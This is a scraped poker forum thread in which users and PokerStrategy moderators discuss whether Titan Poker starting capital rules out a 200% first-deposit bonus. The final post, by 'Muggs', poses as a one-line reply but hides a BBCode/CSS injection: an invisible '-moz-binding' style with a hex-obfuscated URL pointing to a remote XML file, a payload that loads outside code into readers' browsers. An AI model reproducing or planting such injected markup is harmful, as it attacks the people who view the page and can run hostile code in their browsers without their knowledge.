Titan bonus

• anc
      anc
      Bronze
      Hello to everyone.

I've had my Titan account for about a month now and doing quite ok with 50 bucks Piokerstrategy gave me.
      I wonder if im still eligible for that 200% depozit bonus?

Lp, anc.
  • 9 replies
    • thunderbird56
      thunderbird56
      Bronze
      Hi anc,

Unfortunately you cannot get the First Deposit Bonus because the starting capital counts as the first deposit. However my tip for you is to contact Titan online support before you make deposit since maybe he'll offer you a very nice RELOAD bonus. ;)

Good luck at the tables!
      -thunderbird56-
    • Puschkin81
      Puschkin81
      Bronze
      Hi anc!

Welcome at PokerStrategy! thunderbird56 is right. Unfortunately you cannot benefit from our first deposit bonus because we already made the first deposit for you. Did you already clear the additional $100 bonus? If not, please read this guide (especially step 4): http://www.pokerstrategy.com/quiz/platform/3

Good luck at the tables!
      Puschkin81
    • zamwise
      zamwise
      Silver
      Hi guys,

I received a same kind of 50$ starting capital as PokerStrategy offers to Titan about half year ago and gambled it away... :/ but after I joined PokerStrategy I got my account there retracked to PokerStrategy and even though I had received taf transfers there I got that first deposit bonus when I made a deposit. I also received two tournament tokens that are for new depositors.

So how is that so that when receiving starting capital from PokerStrategy you loose the eligibility to first deposit bonus even when that doesn't happen when receiving same kind of starting capital from another site?

Hope you can work it out, hoping the best for PokerStrategy :)

-- Z --
    • thunderbird56
      thunderbird56
      Bronze
      Hi zamwise,

What we are referring to is the 200% up to $600 bonus on the first deposit which is a special deal between PokerStartegy and TitanPoker. If someone already got the $50+$100 starting money from us, he cannot benefit from this bonus (actually the additional $100 is considered as First Deposit bonus). However, as i mentioned above, when you deposit your own money, Titan may offer you some kind of Reload bonus. I guess what you got is that Reload bonus. Anyway, i can't say anything about what other affiliates offer you.

Good luck at the tables!
      -thunderbird56-
    • zamwise
      zamwise
      Silver
      200% bonus was what I got, deposited 20$ and I have already received 4 times 10$ as a bonus. I also received the other goods what new depositors should receive.

What I tried to say is, that if people loose those benefits when they receive starting capital from PokerStrategy there is something you need to re-negotiate :)

-- Z --
    • thunderbird56
      thunderbird56
      Bronze
      Hi zamwise,

Your case is a special one. I mean your account is retracked to us, and you didn't get the starting money, so that's why you were still eligible for our 200% First Deposit Bonus. ;)

Regarding your suggestion: we're working on it. Hope that we'll be able to offer both starting capital and First Deposit Bonus in the near future.

Good luck at the tables!
      -thunderbird56-
    • anc
      anc
      Bronze
      Thanks guys.
      I'll contact online help, hope they give me a nice bonus.
    • Puschkin81
      Puschkin81
      Bronze
      Originally posted by zamwise
      200% bonus was what I got, deposited 20$ and I have already received 4 times 10$ as a bonus. I also received the other goods what new depositors should receive.

What I tried to say is, that if people loose those benefits when they receive starting capital from PokerStrategy there is something you need to re-negotiate :)

-- Z --
      Don't worry. We are working on it. But as already mentioned: your case was a special case.

Good luck at the tables!
      Puschkin81
    • Muggs
      Muggs
      Bronze
      You cannot get the First Deposit Bonus. I have the same problem ))) http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]